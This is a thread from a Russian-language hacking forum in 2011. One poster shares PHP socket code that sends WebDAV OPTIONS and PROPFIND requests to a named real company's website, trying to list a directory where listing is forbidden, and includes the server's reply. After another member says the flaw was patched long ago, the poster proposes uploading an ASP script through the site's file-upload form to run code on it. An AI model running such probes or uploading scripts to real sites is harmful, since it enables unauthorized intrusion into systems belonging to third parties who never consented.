IIS 6.0 WebDav Листинг Директории
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
IIS 6.0 WebDav Листинг Директории - 2011-10-17 18:58:48.270000
|
|
|
inx_x
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-17 18:32:34.743333
|
Структуру каталогов сайта я знаю. Листинг запрещен. Начал делать согласно статье http://www.xakep.ru/magazine/xa/126/042/1.asp Пишу на php, с использованием сокетов. <?php $host = 'www.telechips.com'; $port = 80; function send($headers, $str = null){
GLOBAL $host, $port;
$OutData = '';
$strA = is_null($str) ? '<br />' : $str;
$SockHDC = fsockopen(gethostbyname($host), $port);
if (!$SockHDC){
return 0;
}
fputs($SockHDC,$headers);
while (!feof($SockHDC)) {
$OutData .= fgets($SockHDC).'<br />';
}
fclose($SockHDC);
return $OutData;
}
$headers = "OPTIONS / HTTP/1.1\r\n";
$headers.= "Host: ".$host."\r\n";
$headers.= "Connection: close\r\n\r\n";
return send($headers);
?> Получаю ответ: quote:
HTTP/1.1 200 OK Connection: close Date: Mon, 17 Oct 2011 14:43:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET MS-Author-Via: DAV Content-Length: 0 Accept-Ranges: none DASL: DAV: 1, 2 Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK Cache-Control: private Видно, что WebDav подключен. Продолжаю копать. $xml = '<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>';
$headers = "PROPFIND /webupload/ HTTP/1.1\r\n";
$headers.= "Host: www.telechips.com\r\n";
$headers.= "User-Agent: Mozilla\r\n";
$headers.= "Connection: TE\r\n";
$headers.= "TE: trailers\r\n";
$headers.= "Depth: 1\r\n";
$headers.= "Content-Length: ".strlen($xml)."\r\n";
$headers.= "Content-Type: text/xml\r\n\r\n";
$headers.= $xml;
$headers.= "\r\n\r\n";
return send($headers); Ответа от сервера не получаю =(. т.е. страница просто грузиться и все. Кто-нибудь пробовал данный метод на практике?
|
|
|
RE: IIS 6.0 WebDav Листинг Директории - 2011-10-18 10:33:50.710000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Ну так эта уязвимость не работает давно, почему вы думаете что получите что-то?
|
|
|
RE: IIS 6.0 WebDav Листинг Директории - 2011-10-18 16:51:32.203333
|
|
|
inx_x
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-17 18:32:34.743333
|
Есть ли еще какие-нибудь способы получить содержимое каталога? Пока только есть бредовая идея. На сайте есть возможность загрузить файл. Узнать бы каталог, в который все это кладется. Если имя файла не меняется, то можно попробовать закинуть asp-скрипт. Кста заливаются файлы любого типа.
|
|
|
|
|